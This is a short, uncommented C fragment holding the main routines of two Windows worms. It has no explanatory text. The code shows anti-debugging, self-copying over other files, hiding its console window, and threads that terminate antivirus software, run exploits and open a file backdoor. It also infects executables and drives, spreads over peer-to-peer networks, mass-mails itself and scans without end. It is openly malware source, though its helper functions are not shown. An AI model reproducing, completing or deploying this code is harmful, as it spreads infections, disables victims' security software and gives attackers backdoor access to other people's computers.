int main(int argc, char *argv[]) { if(IsDebuggerPresent()) return 1; if(argc==2) { char Thif[256]; GetModuleFileName(NULL,Thif,sizeof(Thif)); if(argv[1]==Thif) goto part; SetFileAttributes(argv[1],FILE_ATTRIBUTE_NORMAL); CopyFile(Thif,argv[1],FALSE); } part: CreateMutex(NULL,0,"n349u43jEg35545"); if(GetLastError()==ERROR_ALREADY_EXISTS) return 1; AllocConsole(); ShowWindow(FindWindowA("ConsoleWindowClass",NULL),SW_HIDE); CreateThread(NULL,0,AntiVirusTerminate,NULL,0,NULL); CreateThread(NULL,0,ExploitMain,NULL,0,NULL); CreateThread(NULL,0,FileBackdoor,NULL,0,NULL); Install(); HOSTSFile(); InfectExes(); p2p_spread(); InfectDrives(); return 0; }
void sync_main(struct sync_t *sync) { DWORD tid; sync->start_tick = GetTickCount(); sync_check_frun(sync); if (!sync->first_run) if (sync_mutex(sync)) return; if (sync->first_run) CreateThread(0, 0, sync_visual_th, NULL, 0, &tid); payload_xproxy(sync); if (sync_checktime(sync)) return; sync_install(sync); sync_startup(sync); payload_sco(sync); p2p_spread(); massmail_init(); CreateThread(0, 0, massmail_main_th, NULL, 0, &tid); scan_init(); for (;;) { scan_main(); Sleep(1024); } }